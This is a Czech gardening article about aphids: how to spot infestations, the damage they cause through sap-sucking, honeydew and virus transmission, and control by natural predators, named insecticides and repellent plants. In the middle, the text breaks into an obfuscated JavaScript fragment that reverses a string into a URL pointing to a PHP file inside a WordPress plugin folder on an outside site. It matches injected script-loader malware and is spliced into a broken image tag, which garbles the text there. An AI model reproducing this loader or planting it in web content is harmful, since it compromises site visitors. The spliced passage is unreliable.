Mšice z rostlin sají šťávu, tím je připravují o živiny a oslabují je, navíc se velmi rychle množí. Když už se na rostlinách objeví, je proto nutné urychleně zakročit. Jak je poznáte a jak s nimi bojovat?
V přírodě, která byla kdysi místem naší zahrady, se vždy vyskytovala spousta živočichů, kteří bránili mšicím v množení a snižovali jejich počet, aby nepůsobily kalamitní hrozbu pro stávající rostliny. Zahrada však není izolovaná od zbytku světa, a tak se mšice z okolí rok co rok přesunou do prázdného prostoru po vyhubených mšicích. Tento cyklus se opakuje i několikrát ročně.
Malý ale zákeřný
Mšice je malý saví hmyz dosahující velikosti dvou až deseti milimetrů a mají měkké tělo. Na napadené rostlině vytvoří velký shluk a velmi rychle se množí, během jednoho roku může vzniknout dokonce až třicet generací. Napadení mšicí poznáte zejména podle listů, které jsou povadlé, zkroucené, bez života, ztrácejí barvu. Podívejte se na jejich spodní stranu a nejspíš uvidíte spoustu malých potvůrek.
Některé se specializují na jednu nebo malý okruh rostlin, jiné mají širší spektrum a jsou dokonce vývojově závislé na několika hostitelích. Jsou vybaveni vynikajícími sacími orgány a dokážou proniknout skrz silnější kůru přímo do cévních svazků rostlin a v mladých měkkých částech rostlin napadají tkáně, v nichž proudí životodárné tekutiny rostliny. Protože tyto šťávy obsahují kromě menšího množství bílkovin a dalších pro mšice důležitých živin také příliš mnoho cukru, vylučují mšice jeho přebytek ve formě medovice.
Nepřítel úrody
Když se mšice rozmnoží, je schopna vysát z rostlin velké množství živin, což má za následek zastavení jejich růstu, vývoje plodů a květních pupenů v příštím roce, deformované listy a výhony, sníženou odolnost vůči škodlivým činitelům a v případě dřevin i odolnost vůči mrazu. Při sání mšice uvolňují do rostliny oslabující jedovaté látky a s nimi i viry. To má ničivé účinky na ovocné stromy (např. mšice švestková napadá broskvoně a meruňky).
Tyto viry nelze léčit a stromy musí být spáleny. Kromě toho je lepkavá medovice na listech výbornou živnou půdou pro různé plísně a houby, které ničí samotné listy, a tím zhoršují fotosyntetický potenciál rostlin. Kromě škod, které mšice způsobují sáním, způsobují vážnější škody tím, že přenášejí virové choroby, když se přesouvají z rostliny na rostlinu.
Zasáhněte okamžitě
Poté se se u vás na zahradě nebo doma mšice objeví, je nutné reagovat urychleně. Bojovat s nimi můžete hned několika způsoby.
Nasadit můžete přírodní predátory, jako jsou zlatoočko, parazitická vosička nebo slunéčko sedmitečné. Mšicemi se živí jak larvy slunéčka, které dokáží za měsíc zlikvidovat víc než tisícovku mšic, tak i dospělí jedinci. Nevýhodou tohoto zasáhu je to, že na predátora mohou kdykoliv zaútočit mravenci. Pro ty je totiž sladká medovice, kterou mšice vytváří, vysloveně pochoutkou, a proto tyto škůdce k nelibosti všech zahradníků ochraňují.
and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandsome-cheerful-gardener-smiling-taking-care-flowers-1024×683.jpg“ alt=““ width=“696″ height=“464″>
Jinou možností je vybrat si některý z insekticidů. U všech těchto produktů je potřeba věnovat pozornost informacím o tom, kdy je vhodné prostředek aplikovat, v jaké fázi vegetačního období, kolikrát během vegetace, ale i jaká je tzv. ochranná lhůta. To je doba, po kterou nelze ošetřené plodiny konzumovat, anebo, po kterou nelze manipulovat s ošetřenými okrasnými rostlinami.
Ochraňte vaše okrasné rostliny, ovoce i zeleninu proti savým a žravým mšicím. SANIUM AL je insekticidní přípravek vhodný k přímému použití pomocí rozprašovače, který zahubí právě zmíněné mšice ale i molice, třásněnky a jiný nežádoucí hmyz. Přípravek působí již první hodinu po aplikaci a ochrání rostlinu až po dobu 8 týdnů. Účinná látka flupyradifuron je nový listový insekticid se systémovým účinkem. Působí na hmyz při kontaktu, ale rovněž při příjmu účinné látky sáním na ošetřených rostlinách.

Insekticid na přírodní bázi neobsahuje chemii a k jeho využití dochází čím dál více. Insekticidní (přírodní) přípravek na kontrolu a hubení mšic, roztočů a dalšího hmyzu na růžích, okrasných rostlinách a zelenině. Vytváří lepivý povlak na povrchu rostliny, který jí neškodí, ale škůdce zahubí. Je na bázi přírodních polysacharidů.
Pokud je vám bližší právě hubení škůdců bez chemie, můžete na své zahradě vysázet rostliny, které mšice odpuzují, např. lichořeřišnici, pažitku, saturejku nebo heřmánek.
Jak bojujete proti mšicím? Poraďte ostatním čtenářům nebo nám napište.